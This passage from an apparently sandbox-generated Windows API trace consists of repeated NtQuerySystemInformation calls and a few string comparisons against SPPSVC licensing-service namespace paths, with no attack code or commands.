SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0287.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0287.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0287.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0287.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0287.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0287.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0287.205] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cca0, Length=0x28, ResultLength=0x0) [0287.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0287.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0287.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0287.218] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0287.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cca0, Length=0x28, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0287.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0287.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x28, ResultLength=0x0) [0287.231] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0287.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x28, ResultLength=0x0) [0287.232] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0287.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 